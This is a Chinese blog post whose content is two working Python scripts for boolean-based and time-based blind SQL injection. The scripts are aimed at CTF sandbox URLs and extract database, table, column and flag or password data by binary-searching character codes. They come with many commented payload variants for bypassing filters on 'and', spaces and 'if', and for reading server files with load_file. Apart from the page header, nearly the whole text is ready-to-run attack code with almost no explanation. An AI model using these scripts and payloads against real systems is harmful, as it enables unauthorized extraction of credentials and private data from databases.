sql盲注py脚本

最新推荐文章于 2024-08-31 14:48:21 发布

Ai Hyperion

最新推荐文章于 2024-08-31 14:48:21 发布

阅读量470

点赞数

分类专栏： sql注入

本文链接：https://blog.csdn.net/pop364/article/details/105742224

版权

sql注入专栏收录该内容

3 篇文章 0 订阅

订阅专栏

import requests
#url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
#url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-8001a3f6b43953f3.sandbox.ctfhub.com:10080/"
result = ''

# 估计有10个，limit 1-10， group_concat会重复
for code in range(0, 10):
    result += " --- next limit data : "    
    for x in range(1, 50):    
    #for x in range(70, 100):
        high = 127
        low = 32
        mid = (low + high) // 2
        while high > low:
        #load_file外带
        #payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
            #数据库名
            #payload = "and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
            #表名
            #payload = "and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d --+" % (code,x, mid)
            #列名
            #payload = "and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d --+" % (code,x, mid)
            #根据情况修改,and 被过滤
            payload = "?id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
            payload = "?id=if(ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
            payload = "?id=if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)

	    # and,空格,if被过滤（必须两个异或，不懂？）            
	    #payload = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(x,mid)                                
	    #数据库名字            
	    #payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(x, mid)  
	    # 表名            
	    #payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(x,mid)           
	    #表名            
	    #payload = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(x,mid)        
	    #列名            
	    payload = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(x, mid)
            #print(payload)

            response = requests.get(url + payload)
            if 'query_success' in response.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
            print(mid)
        result += chr(mid)
        if (mid == 32):
            print(result)
            break;
        print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换，substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'

#IF(expr1,expr2,expr3)
#if(ascii(substr(database(),1,1))>115,0,sleep(5))--+
import requests
import time
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-4209e5f8252d6563.sandbox.ctfhub.com:10080/"
result = ''
for code in range(0,10):
    for x in range(7, 50):
        high = 127
        low = 32
        mid = (low + high) // 2
        while high > low:
            #load_file外带
            #payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
            #数据库名
            #payload = "?id=1 and if(ascii(substr(database(),%d,1))>%d,1,sleep(5))--+" % (x, mid)
            #表名
            payload = "?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            #列名
            #payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            #字段
            payload = "?id=1 and if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            #print(payload)
            #payload = "?id=1 and if(1=1,1,sleep(10))--+"
            ss = time.time()
            response = requests.get(url + payload)
            if time.time() - ss < 4:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
            print(mid)
        result += chr(mid)
        if (mid == 32):
            print(result)
            break;
        print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换，substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'